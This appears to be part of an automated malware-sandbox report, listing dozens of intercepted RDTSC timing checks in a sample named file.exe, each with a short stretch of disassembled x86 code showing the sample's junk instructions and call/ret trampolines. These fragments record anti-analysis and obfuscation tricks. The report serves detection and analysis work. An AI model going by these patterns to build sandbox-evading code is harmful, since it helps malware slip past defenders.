            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4052C7 second address: 4052CB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4052CB second address: 40535D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov dword ptr [esp+04h], eax 0x0000000a je 00007F2E7D1D3444h 0x00000010 pushad 0x00000011 jng 00007F2E7D1D3436h 0x00000017 jbe 00007F2E7D1D3436h 0x0000001d popad 0x0000001e pop eax 0x0000001f push 00000000h 0x00000021 push edi 0x00000022 call 00007F2E7D1D3438h 0x00000027 pop edi 0x00000028 mov dword ptr [esp+04h], edi 0x0000002c add dword ptr [esp+04h], 0000001Ah 0x00000034 inc edi 0x00000035 push edi 0x00000036 ret 0x00000037 pop edi 0x00000038 ret 0x00000039 movsx edi, cx 0x0000003c push 00000003h 0x0000003e push 00000000h 0x00000040 push eax 0x00000041 call 00007F2E7D1D3438h 0x00000046 pop eax 0x00000047 mov dword ptr [esp+04h], eax 0x0000004b add dword ptr [esp+04h], 0000001Ah 0x00000053 inc eax 0x00000054 push eax 0x00000055 ret 0x00000056 pop eax 0x00000057 ret 0x00000058 cmc 0x00000059 push 00000000h 0x0000005b adc ch, FFFFFFD1h 0x0000005e push 00000003h 0x00000060 xor ecx, dword ptr [ebp+122D3736h] 0x00000066 push BFAFF41Bh 0x0000006b jbe 00007F2E7D1D3451h 0x00000071 push eax 0x00000072 push edx 0x00000073 jmp 00007F2E7D1D343Fh 0x00000078 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 40552A second address: 40552E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 40552E second address: 405567 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 push eax 0x00000008 jmp 00007F2E7D1D3440h 0x0000000d nop 0x0000000e movsx edi, dx 0x00000011 push 00000000h 0x00000013 mov ecx, esi 0x00000015 pushad 0x00000016 sub di, D543h 0x0000001b jbe 00007F2E7D1D3438h 0x00000021 popad 0x00000022 push B91E5E55h 0x00000027 push eax 0x00000028 push edx 0x00000029 pushad 0x0000002a push eax 0x0000002b push edx 0x0000002c rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 405567 second address: 40556D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 40556D second address: 405572 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 405572 second address: 405578 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 405578 second address: 40557C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 425EAA second address: 425ED8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 pushad 0x00000009 popad 0x0000000a jmp 00007F2E7D257EBBh 0x0000000f push eax 0x00000010 pop eax 0x00000011 popad 0x00000012 push esi 0x00000013 push esi 0x00000014 pop esi 0x00000015 pop esi 0x00000016 popad 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007F2E7D257EBFh 0x0000001e rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 425ED8 second address: 425EE3 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jg 00007F2E7D1D3436h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 423C9E second address: 423CA9 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push edx 0x00000008 pop edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 423CA9 second address: 423CBA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jnc 00007F2E7D1D3436h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 423CBA second address: 423CBE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 423CBE second address: 423CE7 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 pushad 0x0000000a jmp 00007F2E7D1D343Fh 0x0000000f push edx 0x00000010 push ebx 0x00000011 pop ebx 0x00000012 pushad 0x00000013 popad 0x00000014 pop edx 0x00000015 jnp 00007F2E7D1D343Eh 0x0000001b pushad 0x0000001c popad 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 423E52 second address: 423E73 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 jmp 00007F2E7D257EC8h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 423E73 second address: 423E9B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2E7D1D343Fh 0x00000009 jmp 00007F2E7D1D3444h 0x0000000e popad 0x0000000f rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 423E9B second address: 423EAB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 js 00007F2E7D257EB6h 0x0000000a je 00007F2E7D257EB6h 0x00000010 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 423EAB second address: 423EE4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2E7D1D3446h 0x00000007 jmp 00007F2E7D1D3449h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push edi 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4242A4 second address: 4242D4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2E7D257EC6h 0x00000007 js 00007F2E7D257EB6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jmp 00007F2E7D257EC0h 0x00000014 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4242D4 second address: 4242DE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnl 00007F2E7D1D3436h 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4242DE second address: 4242E2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4242E2 second address: 4242FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F2E7D1D3436h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 js 00007F2E7D1D3436h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4242FB second address: 4242FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 424469 second address: 4244D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2E7D1D3443h 0x00000009 jmp 00007F2E7D1D3445h 0x0000000e popad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 jmp 00007F2E7D1D3447h 0x00000018 jl 00007F2E7D1D3436h 0x0000001e jbe 00007F2E7D1D3436h 0x00000024 popad 0x00000025 push eax 0x00000026 push edx 0x00000027 jmp 00007F2E7D1D3443h 0x0000002c rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4244D3 second address: 4244E7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2E7D257EBEh 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 419684 second address: 41969D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2E7D1D3440h 0x00000009 push edi 0x0000000a pop edi 0x0000000b pushad 0x0000000c popad 0x0000000d popad 0x0000000e rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 41969D second address: 4196B5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F2E7D257EC4h 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4196B5 second address: 4196B9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 429D7F second address: 429D8E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 mov eax, dword ptr [esp+04h] 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 429D8E second address: 429D92 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 429E92 second address: 429E96 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 429E96 second address: 429EAB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 mov eax, dword ptr [eax] 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e jbe 00007F2E7D1D3436h 0x00000014 popad 0x00000015 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3F4CEB second address: 3F4CF5 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F2E7D257EC2h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3F4CF5 second address: 3F4CFB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3F4CFB second address: 3F4D0B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jg 00007F2E7D257ED6h 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3F4D0B second address: 3F4D1D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2E7D1D343Eh 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3F4D1D second address: 3F4D21 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3EFCE0 second address: 3EFCE6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4320A3 second address: 4320AF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jnl 00007F2E7D257EB6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4321F6 second address: 432209 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a jne 00007F2E7D1D3436h 0x00000010 pushad 0x00000011 popad 0x00000012 popad 0x00000013 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 432209 second address: 432221 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F2E7D257EBFh 0x00000008 pushad 0x00000009 popad 0x0000000a push edx 0x0000000b pop edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 43237E second address: 432382 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 432382 second address: 4323A6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2E7D257EC3h 0x00000007 jmp 00007F2E7D257EBDh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 43497C second address: 434980 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 434C8C second address: 434C91 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 434D5E second address: 434D62 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 434E14 second address: 434E18 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 434E18 second address: 434E1E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 434EB9 second address: 434ECA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2E7D257EBDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 435070 second address: 435074 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4354B5 second address: 4354BB instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 435550 second address: 435554 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4357A2 second address: 4357A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 43592C second address: 43594F instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jmp 00007F2E7D1D343Eh 0x00000008 pop ebx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jg 00007F2E7D1D343Ch 0x00000014 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 43594F second address: 435959 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnc 00007F2E7D257EB6h 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 435A11 second address: 435A1B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 js 00007F2E7D1D3436h 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 435AA2 second address: 435AA6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 435FA1 second address: 435FC2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2E7D1D343Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push esi 0x0000000a pushad 0x0000000b popad 0x0000000c pop esi 0x0000000d popad 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jng 00007F2E7D1D3438h 0x00000017 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 435FC2 second address: 435FC8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 435FC8 second address: 435FCC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4368F6 second address: 436901 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F2E7D257EB6h 0x0000000a popad 0x0000000b rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 436901 second address: 436959 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F2E7D1D3438h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b push 00000000h 0x0000000d push esi 0x0000000e call 00007F2E7D1D3438h 0x00000013 pop esi 0x00000014 mov dword ptr [esp+04h], esi 0x00000018 add dword ptr [esp+04h], 00000018h 0x00000020 inc esi 0x00000021 push esi 0x00000022 ret 0x00000023 pop esi 0x00000024 ret 0x00000025 mov dword ptr [ebp+12461F35h], ecx 0x0000002b mov dword ptr [ebp+1245A754h], edx 0x00000031 push 00000000h 0x00000033 sub dword ptr [ebp+122D283Ah], eax 0x00000039 push 00000000h 0x0000003b jmp 00007F2E7D1D3440h 0x00000040 xchg eax, ebx 0x00000041 pushad 0x00000042 pushad 0x00000043 push eax 0x00000044 push edx 0x00000045 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 43841B second address: 438425 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F2E7D257EB6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 438126 second address: 438151 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F2E7D1D344Ah 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e jng 00007F2E7D1D3436h 0x00000014 pushad 0x00000015 popad 0x00000016 popad 0x00000017 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 439DB1 second address: 439DB5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 439DB5 second address: 439DBB instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 439DBB second address: 439DCD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e push ebx 0x0000000f pop ebx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 439DCD second address: 439DD2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3F6844 second address: 3F685A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F2E7D257EBDh 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 43A386 second address: 43A38C instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 43A38C second address: 43A3ED instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2E7D257EC1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push ebx 0x0000000b jnc 00007F2E7D257ECAh 0x00000011 pop ebx 0x00000012 nop 0x00000013 and di, 9631h 0x00000018 push 00000000h 0x0000001a push 00000000h 0x0000001c push esi 0x0000001d call 00007F2E7D257EB8h 0x00000022 pop esi 0x00000023 mov dword ptr [esp+04h], esi 0x00000027 add dword ptr [esp+04h], 00000014h 0x0000002f inc esi 0x00000030 push esi 0x00000031 ret 0x00000032 pop esi 0x00000033 ret 0x00000034 mov edi, edx 0x00000036 push 00000000h 0x00000038 cmc 0x00000039 push eax 0x0000003a pushad 0x0000003b push eax 0x0000003c push edx 0x0000003d push eax 0x0000003e push edx 0x0000003f rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 43A3ED second address: 43A3F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 43AE41 second address: 43AE59 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 jne 00007F2E7D257EB8h 0x0000000b popad 0x0000000c push eax 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jp 00007F2E7D257EB6h 0x00000016 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 43B6BA second address: 43B6D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 jmp 00007F2E7D1D343Ch 0x0000000a popad 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push ebx 0x0000000f push ecx 0x00000010 pop ecx 0x00000011 pop ebx 0x00000012 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 43B6D3 second address: 43B6E3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F2E7D257EBCh 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 43C3D0 second address: 43C3D5 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 43E029 second address: 43E02F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 43FAFB second address: 43FB00 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 43FB00 second address: 43FB14 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F2E7D257EB6h 0x0000000a popad 0x0000000b push eax 0x0000000c jno 00007F2E7D257EB6h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 440C0E second address: 440C8C instructions: 0x00000000 rdtsc 0x00000002 ja 00007F2E7D1D343Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d push 00000000h 0x0000000f push ebx 0x00000010 call 00007F2E7D1D3438h 0x00000015 pop ebx 0x00000016 mov dword ptr [esp+04h], ebx 0x0000001a add dword ptr [esp+04h], 00000016h 0x00000022 inc ebx 0x00000023 push ebx 0x00000024 ret 0x00000025 pop ebx 0x00000026 ret 0x00000027 add di, 4115h 0x0000002c push 00000000h 0x0000002e push 00000000h 0x00000030 push edi 0x00000031 call 00007F2E7D1D3438h 0x00000036 pop edi 0x00000037 mov dword ptr [esp+04h], edi 0x0000003b add dword ptr [esp+04h], 00000014h 0x00000043 inc edi 0x00000044 push edi 0x00000045 ret 0x00000046 pop edi 0x00000047 ret 0x00000048 mov dword ptr [ebp+122D30F2h], ecx 0x0000004e push 00000000h 0x00000050 push eax 0x00000051 push eax 0x00000052 push edx 0x00000053 jnp 00007F2E7D1D344Fh 0x00000059 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 441B50 second address: 441B6A instructions: 0x00000000 rdtsc 0x00000002 jp 00007F2E7D257EB8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F2E7D257EBAh 0x00000013 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 440D8A second address: 440E2F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 jmp 00007F2E7D1D3445h 0x0000000a popad 0x0000000b nop 0x0000000c add dword ptr [ebp+122D33A3h], edi 0x00000012 push dword ptr fs:[00000000h] 0x00000019 sub ebx, 77358400h 0x0000001f jl 00007F2E7D1D3436h 0x00000025 mov dword ptr fs:[00000000h], esp 0x0000002c push 00000000h 0x0000002e push edx 0x0000002f call 00007F2E7D1D3438h 0x00000034 pop edx 0x00000035 mov dword ptr [esp+04h], edx 0x00000039 add dword ptr [esp+04h], 00000015h 0x00000041 inc edx 0x00000042 push edx 0x00000043 ret 0x00000044 pop edx 0x00000045 ret 0x00000046 or dword ptr [ebp+122D2B0Eh], edx 0x0000004c mov eax, dword ptr [ebp+122D15BDh] 0x00000052 cld 0x00000053 push FFFFFFFFh 0x00000055 push 00000000h 0x00000057 push ecx 0x00000058 call 00007F2E7D1D3438h 0x0000005d pop ecx 0x0000005e mov dword ptr [esp+04h], ecx 0x00000062 add dword ptr [esp+04h], 0000001Bh 0x0000006a inc ecx 0x0000006b push ecx 0x0000006c ret 0x0000006d pop ecx 0x0000006e ret 0x0000006f mov edi, dword ptr [ebp+122D38B2h] 0x00000075 call 00007F2E7D1D343Dh 0x0000007a pop ebx 0x0000007b nop 0x0000007c push eax 0x0000007d push eax 0x0000007e push edx 0x0000007f pushad 0x00000080 popad 0x00000081 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 440E2F second address: 440E33 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 442B80 second address: 442B87 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 442B87 second address: 442B8D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 442B8D second address: 442B91 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
